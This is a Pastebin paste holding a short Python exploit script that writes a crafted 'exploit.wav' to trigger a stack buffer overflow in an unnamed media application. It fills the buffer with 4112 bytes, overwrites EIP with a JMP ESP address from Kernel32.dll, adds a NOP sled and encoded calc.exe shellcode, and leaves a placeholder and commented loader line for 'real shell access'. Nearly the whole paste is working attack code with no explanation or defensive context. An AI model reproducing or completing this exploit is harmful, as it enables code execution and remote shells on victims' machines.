Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import struct
- filename="exploit.wav"
- fill ="A"*4112
- #eip = struct.pack('<I',0x42424242) # EIP overwrite verfication
- eip = struct.pack('<I',0x7C874413) # JMP ESP instruction from Kernel32.dll
- offset = "\x90"*10
- available_shellcode_space = 320
- # Place for calc.exe shellcode
- calc = ("\xba\x86\x2c\x9a\x7b\xd9\xc2\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
- "\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\x89\xce\x6f\x87\x7d\x8c"
- "\x90\x78\x7d\xf1\x19\x9d\x4c\x31\x7d\xd5\xfe\x81\xf5\xbb\xf2"
- "\x6a\x5b\x28\x81\x1f\x74\x5f\x22\x95\xa2\x6e\xb3\x86\x97\xf1"
- "\x37\xd5\xcb\xd1\x06\x16\x1e\x13\x4f\x4b\xd3\x41\x18\x07\x46"
- "\x76\x2d\x5d\x5b\xfd\x7d\x73\xdb\xe2\x35\x72\xca\xb4\x4e\x2d"
- "\xcc\x37\x83\x45\x45\x20\xc0\x60\x1f\xdb\x32\x1e\x9e\x0d\x0b"
- "\xdf\x0d\x70\xa4\x12\x4f\xb4\x02\xcd\x3a\xcc\x71\x70\x3d\x0b"
- "\x08\xae\xc8\x88\xaa\x25\x6a\x75\x4b\xe9\xed\xfe\x47\x46\x79"
- "\x58\x4b\x59\xae\xd2\x77\xd2\x51\x35\xfe\xa0\x75\x91\x5b\x72"
- "\x17\x80\x01\xd5\x28\xd2\xea\x8a\x8c\x98\x06\xde\xbc\xc2\x4c"
- "\x21\x32\x79\x22\x21\x4c\x82\x12\x4a\x7d\x09\xfd\x0d\x82\xd8"
- "\xba\xe2\xc8\x41\xea\x6a\x95\x13\xaf\xf6\x26\xce\xf3\x0e\xa5"
- "\xfb\x8b\xf4\xb5\x89\x8e\xb1\x71\x61\xe2\xaa\x17\x85\x51\xca"
- "\x3d\xe6\x34\x58\xdd\xc7\xd3\xd8\x44\x18")
- # Place for actual shellcode
- shell =()
- #nop = "\x90"*(available_shellcode_space-len(shell)-len(offset))
- #exploit = fill + eip + offset + shell + nop
- exploit = fill + eip + offset + calc #loader for simple proof of concept for shell cdoe
- #exploit = fill + eip + offset + shell #loader for real shell access
- open('exploit.wav', 'w').close()
- writeFile = open (filename, "w")
- writeFile.write(exploit)
- writeFile.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement